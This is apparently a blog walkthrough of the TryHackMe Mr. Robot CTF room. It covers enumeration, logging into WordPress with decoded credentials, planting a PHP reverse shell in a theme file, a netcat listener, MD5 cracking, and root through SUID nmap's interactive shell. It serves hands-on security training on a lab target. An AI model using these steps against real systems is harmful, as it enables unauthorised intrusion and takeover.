The Mr. Robot CTF on TryHackMe is a medium-level challenge inspired by the famous TV series. If solved, you’ll also earn a special badge from TryHackMe.

In this walkthrough, we’ll go step by step, starting with reconnaissance, enumeration, exploitation, user access, and finally root escalation.

Initial Scan

As with any CTF, the first step is reconnaissance. I started by scanning the target with nmap:

nmap -sCV -vv <target-ip>

The output revealed that port 80 (HTTP) was open, which means there’s a web service running. That’s always a good place to start investigating. So, let’s move on to web enumeration.

Part 2: Web Enumeration & First Flag

After confirming that port 80 was open, I browsed to the web application. The landing page looked interesting but didn’t immediately reveal anything useful.

To dig deeper, I used Gobuster for directory brute-forcing:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt

Gobuster Results

The scan revealed several useful directories, including:

• /robots.txt

1. First Flag

Visiting:

http://<target-ip>/key-1-of-3.txt

revealed the first flag ✅.

2. Wordlist Discovery

The /robots.txt file also pointed to /fsocity.dic. Accessing it revealed a large wordlist file — highly suspicious and likely intended for login brute-forcing later. Definitely something to keep in mind.

With the first flag secured and a potential wordlist for cracking, it was time to keep enumerating.

Part 3: Finding Credentials & Gaining WordPress Access

Continuing with web enumeration, another interesting directory found by Gobuster was /license. Visiting this path revealed an encoded string that stood out as a likely clue.

Decoding the License String

• I copied the encoded text and used hashes.com to identify its type. It was detected as Base64.

• Decoding the Base64 string (you can use online tools such as base64decode.org) revealed what appeared to be login credentials.

These credentials pointed towards a WordPress user account — likely elliot (the main character of the show).

Logging in to WordPress

With the decoded username and password, I accessed the WordPress login panel at:

http://<target-ip>/wp-login.php

After entering the credentials, I successfully logged in as user elliot. This granted access to the WordPress admin dashboard, which is perfect for moving forward with exploitation.

Part 4: Uploading a Reverse Shell & Getting a Shell

With access to the WordPress dashboard as user elliot, it was time to leverage that privilege for code execution.

Uploading a PHP Reverse Shell

• I navigated to: Appearance → Editor.
• Here, I was able to edit theme files directly.
• I downloaded a standard PHP reverse shell from PentestMonkey.
• Using the editor, I replaced the contents of 404.php in the active theme (often TwentyFifteen) with the reverse shell code.
• Before saving, I updated the reverse shell script with my TryHackMe VPN IP address and a port of my choice.

Triggering the Shell

• On my attacking machine, I started a listener with:

nc -lvnp <chosen-port>

• Then, I accessed:

http://<target-ip>/wp-includes/themes/TwentyFifteen/404.php

which triggered the reverse shell and connected me to the target.

At this stage, I now had a shell on the target machine as the web server user.

Part 5: Post-Exploitation & Gaining User Access

With a shell on the target, the next steps focused on exploring the system and escalating to a real user account.

Exploring Home Directories

• I stabilized the shell for easier navigation.
• Entered the users’ home directory:

cd /home
ls

• Found entries for two users, including robot.

The Second Flag and a Password Hash

• Navigated to:

cd robot

• Located key-2-of-3.txt, but did not have read permission.
• Discovered a file named password.raw-md5. Displayed its contents with:

• The file contained an MD5 hash.

Cracking the Password Hash

• Used an online hash-cracker like CrackStation to decode the hash.
• The result was:

username: robot
password: abcdefghijklmnopqrstuvwxyz

Switched user with:

su robot

• and provided the newly cracked password.

This granted access as user robot, and now I could read the second flag in key-2-of-3.txt!

Part 6: Privilege Escalation to Root & Grabbing the Root Flag

With access as user robot, the final step was to gain root privileges and capture the last flag.

Privilege Escalation (SUID Binary Abuse)

• Checked for standard sudo privileges:

sudo -l

but found nothing useful.

Instead, searched for SUID binaries that could be abused:

find / -perm -4000 2>/dev/null

• Discovered that nmap was present with the SUID bit set.

Exploiting SUID Nmap for Root

• Referenced GTFOBins for nmap privilege escalation techniques.
• Launched an interactive shell as root using:

nmap --interactive
!sh

• The prompt changed, confirming root access!

Grabbing the Final Flag

• Navigated to the root directory and retrieved the root flag:

cd /root
cat key-3-of-3.txt

• With this, all three flags were obtained, completing the challenge and unlocking the Mr. Robot badge on TryHackMe.

Part 7: Conclusion & Key Takeaways

Successfully completing the Mr. Robot CTF box on TryHackMe provides a comprehensive journey through classic CTF techniques and real-world exploitation steps.

What This Challenge Covered

• Reconnaissance and enumeration using tools like Nmap and Gobuster to reveal hidden directories and files.
• Decoding and password cracking through base64 and MD5 hash reversal.
• Exploiting WordPress, including theme file editing for remote code execution.
• Privilege escalation using SUID binary abuse (nmap) to obtain root access.

Final Thoughts

This box is excellent for strengthening core penetration testing skills:

• Directory brute-forcing
• Hash cracking
• Lateral movement
• Manual privilege escalation

It’s also a fun homage to the Mr. Robot series — and earning that unique TryHackMe badge is a satisfying bonus!